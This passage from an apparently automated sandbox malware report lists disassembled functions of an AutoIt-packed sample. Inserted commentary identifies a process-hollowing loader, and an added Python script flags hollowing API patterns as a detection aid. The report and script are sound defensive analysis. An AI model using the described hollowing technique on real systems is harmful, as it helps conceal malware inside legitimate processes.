                                                        • Instruction Fuzzy Hash: CE62E830A142589AEB24CFA4C851BDEB376FF58700F1091A9D10DEB394E779AE81CB59
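The entry above is the one to stop at when reading this listing: CreateProcessW, Wow64GetThreadContext and a four-byte ReadProcessMemory in a single function, disassembled from a region at 04D70000 that is not based on a PE image, is the classic shape of a process-hollowing loader (spawn a child, fetch its suspended thread context, read from its address space before overwriting it), and it matches the "Writes to foreign memory regions" and "Modifies the context of a thread in another process" signatures in the overview. Most other entries here come from the PE-backed module at 00710000 and are consistent with the AutoIt v3 interpreter (its version string appears near the top of this listing, as do runtime housekeeping calls such as the SwapMouseButtons registry read), so they are noise for triage. Note that this section is static analysis of memory dumps: an API listed in a function was present in the code, which is not the same as having been observed executing.

The following Python is an added example, not part of the Joe Sandbox report or of Joe Security's tooling. It parses the plain-text layout used in this listing (the "APIs" bullets and the "Memory Dump Source" line of each entry) and flags entries whose API mix covers two or more stages of the hollowing pattern, or whose code lives in a region not backed by a PE image. The API sets for each stage extend the three calls seen above to closely related Windows APIs; the sample text is constructed from entries on this page with argument lists abridged.

```python
"""Triage of Joe Sandbox function entries for process-hollowing indicators.

Added example, not part of the Joe Sandbox report. It parses the plain-text
layout of the "Function" listing ("APIs" bullets, then a "Memory Dump Source"
line) and flags entries whose API set spans two or more hollowing stages or
whose code sits in a region that is not backed by a PE image.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample in the report's layout: two entries from this page,
# argument lists abridged.
SAMPLE = r"""APIs
• CreateProcessW.KERNEL32(?,00000000), ref: 04D71A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04D71AF1
• ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 04D71B13
Memory Dump Source
• Source File: 00000000.00000002.1692690521.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
APIs
• RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001), ref: 0072C979
• RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0072C99A
• RegCloseKey.KERNEL32(00000000), ref: 0072C9BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
Similarity
• String ID: Control Panel\Mouse
"""

# "• Name.MODULE(" or "• Part of subcall function XXXXXXXX: Name.MODULE";
# the module token is the upper-case DLL/library suffix (KERNEL32, LIBCMT, ...).
API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([A-Za-z_][\w:]*)\.([A-Z0-9_]+)"
)
SRC_RE = re.compile(
    r"Source File:\s*(\S+\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)"
)

# Hollowing stages: the report shows a spawn, a thread-context fetch and a
# foreign-memory read in one function; each set also lists the closely
# related APIs a variant of the loader would use instead.
HOLLOWING_STAGES: Dict[str, Set[str]] = {
    "spawn":   {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "context": {"GetThreadContext", "SetThreadContext",
                "Wow64GetThreadContext", "Wow64SetThreadContext"},
    "memory":  {"ReadProcessMemory", "WriteProcessMemory", "VirtualAllocEx",
                "NtUnmapViewOfSection", "ZwUnmapViewOfSection", "ResumeThread"},
}


@dataclass
class FunctionEntry:
    apis: List[str] = field(default_factory=list)
    source: Optional[str] = None
    offset: Optional[int] = None
    pe_backed: Optional[bool] = None


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the listing into entries, collecting API names and the dump source."""
    entries: List[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    for line in text.splitlines():
        header = line.strip()
        # A new entry starts at "APIs", or at "Strings"/"Memory Dump Source"
        # when the previous entry already has its source (entry without APIs).
        if header == "APIs" or (header in ("Strings", "Memory Dump Source")
                                and (current is None or current.source is not None)):
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            current.apis.append(m.group(1))
            continue
        m = SRC_RE.search(line)
        if m:
            current.source, current.offset = m.group(1), int(m.group(2), 16)
            current.pe_backed = m.group(3) == "true"
    return entries


def hollowing_stages(entry: FunctionEntry) -> Set[str]:
    """Names of the hollowing stages this entry's APIs touch."""
    names = set(entry.apis)
    return {stage for stage, apis in HOLLOWING_STAGES.items() if names & apis}


def triage(entries: List[FunctionEntry]) -> List[Tuple[FunctionEntry, List[str]]]:
    """Return (entry, reasons) for the entries an analyst should look at first."""
    findings = []
    for e in entries:
        reasons = []
        stages = hollowing_stages(e)
        if len(stages) >= 2:
            reasons.append("hollowing API pattern: " + ", ".join(sorted(stages)))
        if e.pe_backed is False:
            reasons.append("code in region not backed by a PE image at 0x%08X" % e.offset)
        if reasons:
            findings.append((e, reasons))
    return findings


if __name__ == "__main__":
    for entry, reasons in triage(parse_entries(SAMPLE)):
        print(entry.source, "->", "; ".join(reasons))
```

Run over the sample, the loader entry is reported for both reasons and the registry entry from the PE-backed AutoIt module is not. Requiring two stages rather than one keeps ordinary launchers (CreateProcessW alone) and debuggers' context reads out of the findings; tighten or loosen the stage sets to taste, and feed the script the full "Function" section to rank the whole listing.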
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ccc7551d3b704df90ff7f33e34cdb24f1802d8d1df745e7c85f3f8f1d4656def
                                                        • Instruction ID: 32f960df3bebea27a0c1ffa0a3af873cc1ec19ba2ce1114afb7c0fb218dda726
                                                        • Opcode Fuzzy Hash: ccc7551d3b704df90ff7f33e34cdb24f1802d8d1df745e7c85f3f8f1d4656def
                                                        • Instruction Fuzzy Hash: 84C16E75A4021AFFCB14CFA4C984EAEB7B5FF48710F108599E901AB251D738EE41DBA1
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 0076AF56
                                                        • CoUninitialize.COMBASE ref: 0076AF61
                                                          • Part of subcall function 00751050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 007510B8
                                                        • VariantInit.OLEAUT32(?), ref: 0076AF6C
                                                        • VariantClear.OLEAUT32(?), ref: 0076B23F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                        • String ID:
                                                        • API String ID: 780911581-0
                                                        • Opcode ID: 43dddb425142b0240ae27ae131fe700cfc20d864b7502b661ea884304047bd27
                                                        • Instruction ID: 8987013b6cd0ba046d1b951ace2d9a9503c8e880f9d2785f8dcb6208e58680ba
                                                        • Opcode Fuzzy Hash: 43dddb425142b0240ae27ae131fe700cfc20d864b7502b661ea884304047bd27
                                                        • Instruction Fuzzy Hash: 5BA15B35204701EFC710DF14C895B5AB7E4BF89720F048459F99AAB3A2DB38ED85CB82
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                        • String ID:
                                                        • API String ID: 3877424927-0
                                                        • Opcode ID: 3af6bf1f2897bd57cc1c62b3d674bf095c10ee803b68375a69726c3ec1f1bf85
                                                        • Instruction ID: 9d3fbb5aa916a1ce75239c30afcb8de468dab3e8c3e14ec24b7af0672ea11b63
                                                        • Opcode Fuzzy Hash: 3af6bf1f2897bd57cc1c62b3d674bf095c10ee803b68375a69726c3ec1f1bf85
                                                        • Instruction Fuzzy Hash: 6E51B570A00345DBFB2C9F69C8846AE77A5AF40360F248739F865A72D2D778FD519B40
                                                        APIs
                                                          • Part of subcall function 007116F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00711751
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0071159B
                                                        • CoInitialize.OLE32(00000000), ref: 00711612
                                                        • CloseHandle.KERNEL32(00000000), ref: 007858F7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                        • String ID: '/u
                                                        • API String ID: 458326420-4029691049
                                                        • Opcode ID: 7cad7987c0eb61da53e6869d9d82465d2c45c22f12bb449277322604043089e6
                                                        • Instruction ID: fd6acf4415f8846f676f311584984f058037b2655535098ff144bd7f53c0f3c4
                                                        • Opcode Fuzzy Hash: 7cad7987c0eb61da53e6869d9d82465d2c45c22f12bb449277322604043089e6
                                                        • Instruction Fuzzy Hash: 25719BB4A06281EAC310DFAAB994494BBB5FB593543D4C27FD00A873B2DB7C8854CF59
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock_memmove
                                                        • String ID: EA06
                                                        • API String ID: 1988441806-3962188686
                                                        • Opcode ID: 261d30e67a71c3d7146244e2923acda180b5328e1304374ad932758c7dd1d8f9
                                                        • Instruction ID: 7ac83dda28c07b065d2c7955333e79b910316bb24625a7613d36f8a5a11164c6
                                                        • Opcode Fuzzy Hash: 261d30e67a71c3d7146244e2923acda180b5328e1304374ad932758c7dd1d8f9
                                                        • Instruction Fuzzy Hash: E101F972900258BEEB18C798C816FFE7BF89B05711F00415EE553D2181E5B8A7088B60
                                                        APIs
                                                          • Part of subcall function 007345EC: __FF_MSGBANNER.LIBCMT ref: 00734603
                                                          • Part of subcall function 007345EC: __NMSG_WRITE.LIBCMT ref: 0073460A
                                                          • Part of subcall function 007345EC: RtlAllocateHeap.NTDLL(01760000,00000000,00000001), ref: 0073462F
                                                        • std::exception::exception.LIBCMT ref: 0073013E
                                                        • __CxxThrowException@8.LIBCMT ref: 00730153
                                                          • Part of subcall function 00737495: RaiseException.KERNEL32(?,?,0071125D,007C6598,?,?,?,00730158,0071125D,007C6598,?,00000001), ref: 007374E6
                                                        Similarity
                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                        • String ID: bad allocation
                                                        • API String ID: 3902256705-2104205924
                                                        • Opcode ID: b19150854514076161462baf7292e3b7f9f1c68a4b7761b42b11207d728afa3c
                                                        • Instruction ID: bc9d2cd2d2c3bf15bea68fbc63878711da007caac3e2dba61d240148b2ee5dee
                                                        • Opcode Fuzzy Hash: b19150854514076161462baf7292e3b7f9f1c68a4b7761b42b11207d728afa3c
                                                        • Instruction Fuzzy Hash: 57F02D7500410DE6EB29ABA8DC19ADE77DC9F04350F104025F90491083DB789E90D6E4
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 0075D01E
                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0075D035
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: 4c388d8c4bd05e1b0852554925fa75015bdae19b7efbaa40573d335c5c0c00ed
                                                        • Instruction ID: 6361bdf5984dced49a89ea0feca9998adc5a90a0c07b13bda1fbe69379b0105e
                                                        • Opcode Fuzzy Hash: 4c388d8c4bd05e1b0852554925fa75015bdae19b7efbaa40573d335c5c0c00ed
                                                        • Instruction Fuzzy Hash: 67D05EB154030EBBDB20ABA0ED0EF99B76CA700B09F1081917614D10D1D3F8EA468BA4
                                                        APIs
                                                        • _memset.LIBCMT ref: 007135BE
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00713667
                                                        Similarity
                                                        • API ID: IconNotifyShell__memset
                                                        • String ID:
                                                        • API String ID: 928536360-0
                                                        • Opcode ID: 78b7d549c2af042d1710d6c5819d487bb2981bc165c8bf5245c4d6ffdf79e653
                                                        • Instruction ID: 7b4473353ad67dd91e9afef968ff804157b7f2830d3c04ca5cf511ad3e821b2a
                                                        • Opcode Fuzzy Hash: 78b7d549c2af042d1710d6c5819d487bb2981bc165c8bf5245c4d6ffdf79e653
                                                        • Instruction Fuzzy Hash: 063161B0605341EFD721DF28D8456D7BBF4FB49704F00492EF59A83281E779AA88CB66
                                                        APIs
                                                        • __FF_MSGBANNER.LIBCMT ref: 00734603
                                                          • Part of subcall function 00738E52: __NMSG_WRITE.LIBCMT ref: 00738E79
                                                          • Part of subcall function 00738E52: __NMSG_WRITE.LIBCMT ref: 00738E83
                                                        • __NMSG_WRITE.LIBCMT ref: 0073460A
                                                          • Part of subcall function 00738EB2: GetModuleFileNameW.KERNEL32(00000000,007D0312,00000104,?,00000001,00730127), ref: 00738F44
                                                          • Part of subcall function 00738EB2: ___crtMessageBoxW.LIBCMT ref: 00738FF2
                                                          • Part of subcall function 00731D65: ___crtCorExitProcess.LIBCMT ref: 00731D6B
                                                          • Part of subcall function 00731D65: ExitProcess.KERNEL32 ref: 00731D74
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        • RtlAllocateHeap.NTDLL(01760000,00000000,00000001), ref: 0073462F
                                                        Similarity
                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1372826849-0
                                                        • Opcode ID: fa1711bd30124d740f06f08bbef19577c523bffd8981d3f752d74cd9197b5f13
                                                        • Instruction ID: 42a38c992f504068764ed5d13a407217a72d34446cd82835f624346fca182e32
                                                        • Opcode Fuzzy Hash: fa1711bd30124d740f06f08bbef19577c523bffd8981d3f752d74cd9197b5f13
                                                        • Instruction Fuzzy Hash: 1901F531641301EAFA282F34AC17B6A3358EF82B61F51012AF5019B1C3DFBCBC408666
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0075CC71,?,?,?,?,?,00000004), ref: 0075CFE1
                                                        • SetFileTime.KERNEL32(00000000,?,00000000,?,?,0075CC71,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0075CFF7
                                                        • CloseHandle.KERNEL32(00000000,?,0075CC71,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0075CFFE
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        • Opcode ID: b06c394a8e4b940acc72ba1242bd07cade931836cb262c495d90aa73c1a7f0cd
                                                        • Instruction ID: 211f03578e5864ad34f0a1753908b759d0efff7f17f33232716c8459f4d24350
                                                        • Opcode Fuzzy Hash: b06c394a8e4b940acc72ba1242bd07cade931836cb262c495d90aa73c1a7f0cd
                                                        • Instruction Fuzzy Hash: A2E0E633181218B7D7311B54AC0AFCA7B19EB05775F118111FB55690E087B56D52979C
                                                        APIs
                                                        • _free.LIBCMT ref: 0075C45E
                                                          • Part of subcall function 007328CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00738715,00000000,007388A3,00734673,?), ref: 007328DE
                                                          • Part of subcall function 007328CA: GetLastError.KERNEL32(00000000,?,00738715,00000000,007388A3,00734673,?), ref: 007328F0
                                                        • _free.LIBCMT ref: 0075C46F
                                                        • _free.LIBCMT ref: 0075C481
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 409dc5471866d52cb660d3acacbc6baa69eb1666097d1b0fc545827c793d8a90
                                                        • Instruction ID: f8152d98608155b637a22fd02963b16529e2ed6cabea6b629c783649aaeea60a
                                                        • Opcode Fuzzy Hash: 409dc5471866d52cb660d3acacbc6baa69eb1666097d1b0fc545827c793d8a90
                                                        • Instruction Fuzzy Hash: 92E0C2B1200790CAEA20A9786848FF3A3CC6F04312F04082DF889D3143CF5CE8418034
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CALL
                                                        • API String ID: 0-4196123274
                                                        • Opcode ID: 413bc6bd6fbc9bcff3158879f5ba7c67b16646850b0deb8b201b190406e0b123
                                                        • Instruction ID: 30dea34444c7921aca1fcfbb81d73ee65037a19d232552682062df3bfe784d19
                                                        • Opcode Fuzzy Hash: 413bc6bd6fbc9bcff3158879f5ba7c67b16646850b0deb8b201b190406e0b123
                                                        • Instruction Fuzzy Hash: E1227C70508351DFD724DF28D494A6AB7E1FF84300F15896DE89A8B362D739EC85CB92
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: EA06
                                                        • API String ID: 4104443479-3962188686
                                                        • Opcode ID: e027d2c8d78171836258de77ef1eeb66af8ef019c2229fe11d2887e1794d3c4d
                                                        • Instruction ID: 9588648ea6dc479d11566f7f9441ac800f7a4d3e5a67a2d22c9cd6d739e46c6d
                                                        • Opcode Fuzzy Hash: e027d2c8d78171836258de77ef1eeb66af8ef019c2229fe11d2887e1794d3c4d
                                                        • Instruction Fuzzy Hash: 4A419F71A0415CF7CF219B6C8C567FE7FA29B59300F2845A4EA82D72C3C62D8DC493A1
                                                        APIs
                                                        • _memset.LIBCMT ref: 00783CF1
                                                          • Part of subcall function 007131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007131DA
                                                          • Part of subcall function 00713A67: SHGetMalloc.SHELL32(1<q), ref: 00713A7D
                                                          • Part of subcall function 00713A67: SHGetDesktopFolder.SHELL32(?), ref: 00713A8F
                                                          • Part of subcall function 00713A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00713AD2
                                                          • Part of subcall function 00713B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,007D22E8,?), ref: 00713B65
                                                        Similarity
                                                        • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                        • String ID: X
                                                        • API String ID: 2727075218-3081909835
                                                        • Opcode ID: 1ebd7b0d118175063b0ba29faeb9839e5514073ce646f89734b3309cf2f3281a
                                                        • Instruction ID: 04b732213fedb7e7838c18bb842e0d30bf3f9ae9d9e291d226a91d3788b7b077
                                                        • Opcode Fuzzy Hash: 1ebd7b0d118175063b0ba29faeb9839e5514073ce646f89734b3309cf2f3281a
                                                        • Instruction Fuzzy Hash: FE118DB1A10198EBDF05DF98D8096DE7BF9AF45704F04801DE401B7281DBBD5749CBA5
                                                        Strings
                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 007834AA
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                        • API String ID: 1029625771-2684727018
                                                        • Opcode ID: ef6ef75c666367344661a30838018d666e184735b05b2209e1f75c2463a98988
                                                        • Instruction ID: 474cb3d7b33e6ca5a006518de062cd86868439d930751d34b5185ec755e7579e
                                                        • Opcode Fuzzy Hash: ef6ef75c666367344661a30838018d666e184735b05b2209e1f75c2463a98988
                                                        • Instruction Fuzzy Hash: 50F0447194024DEE9F11EEA8C8559FFB778AA10310B108526A82692182EB3C9B4ACB20
                                                        APIs
                                                        • _memmove.LIBCMT ref: 0073367B
                                                        • __flush.LIBCMT ref: 0073369B
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __flush__getptd_noexit_memmove
                                                        • String ID:
                                                        • API String ID: 3662107617-0
                                                        • Opcode ID: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                                                        • Instruction ID: 30436b56abcf85340e8ee0b9b7ee35e1fdf5935d43502ac56b3b45494dcb431e
                                                        • Opcode Fuzzy Hash: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                                                        • Instruction Fuzzy Hash: 1A41A5B1B00606EFFF388E69C88656E77A5AF44360F24853DE855C7242DB79DF408B50
                                                        APIs
                                                        • 745EC8D0.UXTHEME ref: 007136E6
                                                          • Part of subcall function 00732025: __lock.LIBCMT ref: 0073202B
                                                          • Part of subcall function 007132DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007132F6
                                                          • Part of subcall function 007132DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0071330B
                                                          • Part of subcall function 0071374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0071376D
                                                          • Part of subcall function 0071374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0071377F
                                                          • Part of subcall function 0071374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\DOC092024-0431202229487.exe,00000104,?,007D1120,C:\Users\user\Desktop\DOC092024-0431202229487.exe,007D1124,?,?), ref: 007137EE
                                                          • Part of subcall function 0071374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00713860
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00713726
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                        • String ID:
                                                        • API String ID: 3809921791-0
                                                        • Opcode ID: 19d992e328cd8f453f5f14862d7403477141f9dc373680bdadd573fd36bc80c1
                                                        • Instruction ID: 3224a64c31384f7b65f14a32cce86d90fa92ed975380c87b89b4c25d86d37a07
                                                        • Opcode Fuzzy Hash: 19d992e328cd8f453f5f14862d7403477141f9dc373680bdadd573fd36bc80c1
                                                        • Instruction Fuzzy Hash: D3118171908341EBC310EF69E94990ABFF8FF94710F00851FF444832A2DB789946CB96
                                                        APIs
                                                        • ___lock_fhandle.LIBCMT ref: 0073F7D9
                                                        • __close_nolock.LIBCMT ref: 0073F7F2
                                                          • Part of subcall function 0073886A: __getptd_noexit.LIBCMT ref: 0073886A
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                        • String ID:
                                                        • API String ID: 1046115767-0
                                                        • Opcode ID: b4de08453b027825fd42496d818f1e07f9dc6d831d9e3b7ac65a0cc8bd48c398
                                                        • Instruction ID: 53390651ab4d2d7a7959758e2a0ca77eec73da229e99c70f3356f44f70712a86
                                                        • Opcode Fuzzy Hash: b4de08453b027825fd42496d818f1e07f9dc6d831d9e3b7ac65a0cc8bd48c398
